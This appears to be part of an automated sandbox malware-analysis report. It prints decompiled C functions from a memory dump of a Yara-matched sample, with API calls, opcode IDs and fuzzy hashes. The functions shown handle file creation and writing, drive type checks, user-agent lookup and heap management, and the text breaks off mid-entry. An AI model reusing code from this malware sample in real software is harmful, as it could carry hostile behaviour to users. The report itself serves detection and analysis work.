                                                                                                                                                                                                0x00af2d33
                                                                                                                                                                                                0x00af2d39
                                                                                                                                                                                                0x00af2d43
                                                                                                                                                                                                0x00af2d48
                                                                                                                                                                                                0x00af2d4d
                                                                                                                                                                                                0x00af2d50
                                                                                                                                                                                                0x00af2d51
                                                                                                                                                                                                0x00af2d56
                                                                                                                                                                                                0x00af2d57
                                                                                                                                                                                                0x00af2d58
                                                                                                                                                                                                0x00af2d5f
                                                                                                                                                                                                0x00af2d60
                                                                                                                                                                                                0x00af2d6d
                                                                                                                                                                                                0x00af2d73
                                                                                                                                                                                                0x00af2d78
                                                                                                                                                                                                0x00af2ca7
                                                                                                                                                                                                0x00af2cac
                                                                                                                                                                                                0x00af2cb1
                                                                                                                                                                                                0x00af2cbf
                                                                                                                                                                                                0x00af2cc3
                                                                                                                                                                                                0x00af2cc8
                                                                                                                                                                                                0x00af2cce
                                                                                                                                                                                                0x00af2cd0
                                                                                                                                                                                                0x00af2ce0
                                                                                                                                                                                                0x00af2ce5
                                                                                                                                                                                                0x00af2cea
                                                                                                                                                                                                0x00af2ced
                                                                                                                                                                                                0x00af2cee
                                                                                                                                                                                                0x00af2cf3
                                                                                                                                                                                                0x00af2cf4
                                                                                                                                                                                                0x00af2cf5
                                                                                                                                                                                                0x00af2d02
                                                                                                                                                                                                0x00af2d08
                                                                                                                                                                                                0x00af2cd2
                                                                                                                                                                                                0x00af2cd7
                                                                                                                                                                                                0x00af2cd7
                                                                                                                                                                                                0x00af2d14
                                                                                                                                                                                                0x00af2d19
                                                                                                                                                                                                0x00af2d86
                                                                                                                                                                                                0x00af2d89
                                                                                                                                                                                                0x00af2d90
                                                                                                                                                                                                0x00af2d94
                                                                                                                                                                                                0x00af2d9c
                                                                                                                                                                                                0x00af2daf
                                                                                                                                                                                                0x00af2db4
                                                                                                                                                                                                0x00af2db8
                                                                                                                                                                                                0x00af2d9c
                                                                                                                                                                                                0x00af2dbd

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00AF2D94
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4241100979-0
                                                                                                                                                                                                • Opcode ID: 338d297fcaf426ad1ee491033a2875f4d56b6cae2835724f2cbccf2e7717752e
                                                                                                                                                                                                • Instruction ID: fe5a187c8b88dbf982c769d52c49aecaaa5f48dd822a02c75cf3f348396b969d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 338d297fcaf426ad1ee491033a2875f4d56b6cae2835724f2cbccf2e7717752e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89315EB291021CABDB14B7E4CE56AFE76BCAB04310F040169BB05E7181EF749E448761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5AF2, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5AF2(void* __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t32;
				void* _t38;
				signed int _t39;
				intOrPtr* _t40;
				void* _t46;

				_t46 = __fp0;
				_t38 = __edx;
				_t39 = 0;
				_t16 = E00AF85E5(0x14);
				_t32 =  *0xb0e688; // 0xb20000
				_t40 = _t16;
				if( *((short*)(_t32 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t32 + 0x228));
					_v34 =  *((intOrPtr*)(_t32 + 0x22a));
					_v32 =  *((intOrPtr*)(_t32 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t40 = 2;
				 *(_t40 + 4) = _t39;
				_t17 =  *0xb0e688; // 0xb20000
				 *((intOrPtr*)(_t40 + 8)) =  *((intOrPtr*)(_t17 + 0x224));
				_t18 = E00AF5A6E( *((intOrPtr*)(_t17 + 0x224)), _t38, _t46);
				 *((intOrPtr*)(_t40 + 0xc)) = _t18;
				if(_t18 == 0) {
					L4:
					if(E00AF2DBE() == 0) {
						goto L6;
					} else {
						_t39 = _t39 | 0xffffffff;
					}
				} else {
					_t38 = 0x3b;
					if(E00AFA2AE(_t18, _t38) != 0) {
						L6:
						E00AF4D60(_t40, _t38, _t46);
					} else {
						goto L4;
					}
				}
				E00AFA389();
				E00AFA389();
				return _t39;
			}















                                                                                                                                                                                                0x00af5af2
                                                                                                                                                                                                0x00af5af2
                                                                                                                                                                                                0x00af5afd
                                                                                                                                                                                                0x00af5aff
                                                                                                                                                                                                0x00af5b05
                                                                                                                                                                                                0x00af5b0b
                                                                                                                                                                                                0x00af5b15
                                                                                                                                                                                                0x00af5b1e
                                                                                                                                                                                                0x00af5b29
                                                                                                                                                                                                0x00af5b34
                                                                                                                                                                                                0x00af5b3a
                                                                                                                                                                                                0x00af5b42
                                                                                                                                                                                                0x00af5b42
                                                                                                                                                                                                0x00af5b48
                                                                                                                                                                                                0x00af5b4e
                                                                                                                                                                                                0x00af5b51
                                                                                                                                                                                                0x00af5b5c
                                                                                                                                                                                                0x00af5b5f
                                                                                                                                                                                                0x00af5b64
                                                                                                                                                                                                0x00af5b69
                                                                                                                                                                                                0x00af5b79
                                                                                                                                                                                                0x00af5b80
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5b82
                                                                                                                                                                                                0x00af5b82
                                                                                                                                                                                                0x00af5b82
                                                                                                                                                                                                0x00af5b6b
                                                                                                                                                                                                0x00af5b6d
                                                                                                                                                                                                0x00af5b77
                                                                                                                                                                                                0x00af5b87
                                                                                                                                                                                                0x00af5b89
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5b77
                                                                                                                                                                                                0x00af5b91
                                                                                                                                                                                                0x00af5b99
                                                                                                                                                                                                0x00af5ba4

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • GetDriveTypeW.KERNELBASE(?), ref: 00AF5B42
                                                                                                                                                                                                  • Part of subcall function 00AF4D60: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00AF4DB3
                                                                                                                                                                                                  • Part of subcall function 00AF4D60: GetModuleHandleA.KERNEL32(00000000), ref: 00AF4DBA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule$AllocateDriveHeapType
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2730524069-0
                                                                                                                                                                                                • Opcode ID: 165ac56063869a8a66b434ca96fec131eeec96842b6a788b1997ca30ffcbad9a
                                                                                                                                                                                                • Instruction ID: 50781058b4bee2f2a3d93ae15b1cc4920d2f04b39b6db6df342718dd4bdc1e07
                                                                                                                                                                                                • Opcode Fuzzy Hash: 165ac56063869a8a66b434ca96fec131eeec96842b6a788b1997ca30ffcbad9a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F11C139A007098AD724AFF1E9086FA73F4AF58764F004539FA19CB291FB31D842CB55
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFE492, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                                                                			E00AFE492(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0xb0e6b0; // 0x4d3fdd8
				if( *_t5 == 0) {
					_v8 = E00AF95A8(0x2a7);
					 *0xb0e788 = E00AF9187(_t6, 0);
					E00AF85A3( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00AF85E5(0x101);
					 *0xb0e788 = _t10;
					_t11 =  *0xb0e6b0; // 0x4d3fdd8
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E00AF85FB(0xb0e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








                                                                                                                                                                                                0x00afe495
                                                                                                                                                                                                0x00afe496
                                                                                                                                                                                                0x00afe49e
                                                                                                                                                                                                0x00afe4e8
                                                                                                                                                                                                0x00afe4f5
                                                                                                                                                                                                0x00afe4fa
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe4a0
                                                                                                                                                                                                0x00afe4a5
                                                                                                                                                                                                0x00afe4ac
                                                                                                                                                                                                0x00afe4b5
                                                                                                                                                                                                0x00afe4bc
                                                                                                                                                                                                0x00afe4c3
                                                                                                                                                                                                0x00afe4c7
                                                                                                                                                                                                0x00afe4ff
                                                                                                                                                                                                0x00afe502
                                                                                                                                                                                                0x00afe4c9
                                                                                                                                                                                                0x00afe4db
                                                                                                                                                                                                0x00afe4db
                                                                                                                                                                                                0x00afe4c7

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,00AFE539), ref: 00AFE4C3
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AgentAllocateFreeObtainStringUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 471734292-0
                                                                                                                                                                                                • Opcode ID: ccef8653aae9448a60d49e80e0cff94f842418937f6fd66bb90b5314c222ca62
                                                                                                                                                                                                • Instruction ID: 8caf4cfd05b8249b58f3bc49bfa352cdee1245ab0847706ba518c42f8c60871b
                                                                                                                                                                                                • Opcode Fuzzy Hash: ccef8653aae9448a60d49e80e0cff94f842418937f6fd66bb90b5314c222ca62
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0C230604208EBE749EBF4DE067AA77E09B50320F600668B221D31E0EE74DE40C611
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA69E, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                			E00AFA69E(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                                                                                                                                                                                                0x00afa69e
                                                                                                                                                                                                0x00afa6a1
                                                                                                                                                                                                0x00afa6a2
                                                                                                                                                                                                0x00afa6a5
                                                                                                                                                                                                0x00afa6a7
                                                                                                                                                                                                0x00afa6aa
                                                                                                                                                                                                0x00afa6af
                                                                                                                                                                                                0x00afa6e0
                                                                                                                                                                                                0x00afa6e2
                                                                                                                                                                                                0x00afa6b1
                                                                                                                                                                                                0x00afa6b1
                                                                                                                                                                                                0x00afa6b1
                                                                                                                                                                                                0x00afa6d3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa6d5
                                                                                                                                                                                                0x00afa6d8
                                                                                                                                                                                                0x00afa6de
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa6de
                                                                                                                                                                                                0x00afa6e7
                                                                                                                                                                                                0x00afa6e7
                                                                                                                                                                                                0x00afa6e3
                                                                                                                                                                                                0x00afa6e6

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00AF8F32,?), ref: 00AFA6CB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                                • Opcode ID: df24a98b480644dbf4832a3bdb96d9bc756450f1c753bbc8a788674687782d1b
                                                                                                                                                                                                • Instruction ID: e89ff1f37740173c6cf7b3c7614084c4c7d886d616361a4c608612a88542af8e
                                                                                                                                                                                                • Opcode Fuzzy Hash: df24a98b480644dbf4832a3bdb96d9bc756450f1c753bbc8a788674687782d1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF017B2A10118BFDB50CFE8CD84BEABBACEB14780F144569B609E7100D671EE40DBA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF85FB, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85FB(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E00AFC3D4(_t9);
						}
					} else {
						_t4 = E00AFC3BB(_t9);
					}
					E00AF8730(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0xb0e768, 0, _t9); // executed
				}
				return _t3;
			}






                                                                                                                                                                                                0x00af85fe
                                                                                                                                                                                                0x00af8603
                                                                                                                                                                                                0x00af8649
                                                                                                                                                                                                0x00af8649
                                                                                                                                                                                                0x00af8606
                                                                                                                                                                                                0x00af860a
                                                                                                                                                                                                0x00af860c
                                                                                                                                                                                                0x00af860f
                                                                                                                                                                                                0x00af8615
                                                                                                                                                                                                0x00af8623
                                                                                                                                                                                                0x00af8627
                                                                                                                                                                                                0x00af8627
                                                                                                                                                                                                0x00af8617
                                                                                                                                                                                                0x00af8618
                                                                                                                                                                                                0x00af861d
                                                                                                                                                                                                0x00af8630
                                                                                                                                                                                                0x00af8641
                                                                                                                                                                                                0x00af8641
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                • Opcode ID: de8c5ce6f2affbd066abaadff8faf66a667c7aebf727557bb476bd0098ea218e
                                                                                                                                                                                                • Instruction ID: cc8ae8af23ed2f5e8bb71ea6e73ebb68837f28405d1e1831d7261b90b3b7492b
                                                                                                                                                                                                • Opcode Fuzzy Hash: de8c5ce6f2affbd066abaadff8faf66a667c7aebf727557bb476bd0098ea218e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F06571A0151CABDF612BA4AD01BBE77589F11B75F240241FB14EB1D1DF68ED0086EA
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA639, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA639(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                                                                                                                                                                                                0x00afa643
                                                                                                                                                                                                0x00afa657
                                                                                                                                                                                                0x00afa65c
                                                                                                                                                                                                0x00afa665
                                                                                                                                                                                                0x00afa667
                                                                                                                                                                                                0x00afa671
                                                                                                                                                                                                0x00afa671
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa677
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00AF8F1A), ref: 00AFA654
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 12b642f749f5c504ac63d0bffe408d955602b8fbfde8dc848d54a7e3d3aabef0
                                                                                                                                                                                                • Instruction ID: 35c5933db662a1c9330cf247ce96b891004d8e2ea7c85e31c0397354fa171919
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12b642f749f5c504ac63d0bffe408d955602b8fbfde8dc848d54a7e3d3aabef0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FE09AB27001187EE76017A8ACC8FB726ACE7A57F9F060730F729C72A0CA218C008271
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA7BF, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA7BF(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E00AFA639(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E00AFA69E(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                                                                                                                                                                                                0x00afa7c8
                                                                                                                                                                                                0x00afa7c9
                                                                                                                                                                                                0x00afa7ce
                                                                                                                                                                                                0x00afa7d2
                                                                                                                                                                                                0x00afa7e1
                                                                                                                                                                                                0x00afa7e9
                                                                                                                                                                                                0x00afa7f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa7f9
                                                                                                                                                                                                0x00afa7ed
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa7ed
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: de7874ee2f565e643f18f95b0b7a8edb132e8fdc1259b2e7794c3e67815dbeb1
                                                                                                                                                                                                • Instruction ID: 6feb8462e76c023e19e644ef08aed058889646cf1784a0f58d4d99cf8a416fc3
                                                                                                                                                                                                • Opcode Fuzzy Hash: de7874ee2f565e643f18f95b0b7a8edb132e8fdc1259b2e7794c3e67815dbeb1
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E0D87620472E6B8B11ABE8ED90DFA37649F683707204711FA2ECB2C1DE30D94146C6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF9887, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF9887(void* __eflags, intOrPtr _a4) {
				intOrPtr _t24;

				_t24 = _a4;
				if(E00AFA501( *(_t24 + 0x1c), 0x3a98) >= 0) {
					FindCloseChangeNotification( *(_t24 + 0x1c));
					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
						E00AF982B(_t24, 1);
					}
					return  *((intOrPtr*)(_t24 + 0x18));
				}
				return 0;
			}




                                                                                                                                                                                                0x00af988b
                                                                                                                                                                                                0x00af989d
                                                                                                                                                                                                0x00af98ab
                                                                                                                                                                                                0x00af98b8
                                                                                                                                                                                                0x00af98bb
                                                                                                                                                                                                0x00af98c2
                                                                                                                                                                                                0x00af98c2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af98c7
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AF98AB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 81b10f2f4e83e19184985194169bb94f7a8910210e8f7c146ea58a1fcb2a03e8
                                                                                                                                                                                                • Instruction ID: 802afc66a314210481480dcc0fd6a3d495c411d5067de9bd027eb8f5ea68e422
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81b10f2f4e83e19184985194169bb94f7a8910210e8f7c146ea58a1fcb2a03e8
                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F030312007099BC720AFA6E944A77B7F9EF663947108929F68787A61DA31F80597C1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFB379, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E00AFB379(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0xb0e684; // 0x4d3f6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0xb0e684; // 0x4d3f6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}








                                                                                                                                                                                                0x00afb379
                                                                                                                                                                                                0x00afb381
                                                                                                                                                                                                0x00afb386
                                                                                                                                                                                                0x00afb38c
                                                                                                                                                                                                0x00afb390
                                                                                                                                                                                                0x00afb392
                                                                                                                                                                                                0x00afb397
                                                                                                                                                                                                0x00afb3a0
                                                                                                                                                                                                0x00afb3a4
                                                                                                                                                                                                0x00afb3a4
                                                                                                                                                                                                0x00afb3ac
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afb3af
                                                                                                                                                                                                0x00afb3b3

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00AF3C7D,?,?,?,?,?,?,?,?,00AF3D62,00000000), ref: 00AFB3AC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 96fde83953427d72aad55454883a7bce16e96b4c2bd700452a83d942f746f743
                                                                                                                                                                                                • Instruction ID: 91aaab4aba3f97c035f9efe97b425e230fa01178333589c32e73f764c56957b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 96fde83953427d72aad55454883a7bce16e96b4c2bd700452a83d942f746f743
                                                                                                                                                                                                • Instruction Fuzzy Hash: ECE04F363101219BD6204BA9ED4CF777A79EBE5A51B060268FA15CB211CF21C802C7B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA67D, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                			E00AFA67D(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                                                                                                                                                                                                0x00afa691
                                                                                                                                                                                                0x00afa694
                                                                                                                                                                                                0x00afa699
                                                                                                                                                                                                0x00afa69d

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00AFA70B,00000000,00000400,00000000,00AFF8F7,00AFF8F7,?,00AFFA98,00000000), ref: 00AFA691
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 4702864ff185202412dc518f03d47bb9657b799d0b40f37721d47d373f6ca1d4
                                                                                                                                                                                                • Instruction ID: 69429ab9919cf0e4591e47c1b63d5dd9b0028a2230de259e54fc6012bf39e033
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4702864ff185202412dc518f03d47bb9657b799d0b40f37721d47d373f6ca1d4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03D012B13601017EFB1C8B34DD56F71329CD710701F11065C7A16D60D1C955D5048710
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF4998, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF4998() {
				int _t3;
				void* _t4;

				_t3 = FindCloseChangeNotification( *0xb0e748);
				_t4 =  *0xb0e748; // 0x0
				_t5 =  !=  ? 0 : _t4;
				 *0xb0e748 =  !=  ? 0 : _t4;
				return _t3;
			}





                                                                                                                                                                                                0x00af49a3
                                                                                                                                                                                                0x00af49a6
                                                                                                                                                                                                0x00af49b0
                                                                                                                                                                                                0x00af49b3
                                                                                                                                                                                                0x00af49b9

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00AF5086), ref: 00AF49A3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 7b3604a2caf5f0f1036a2b3a535c5e63340eec4202a12e6300b20e3694a98914
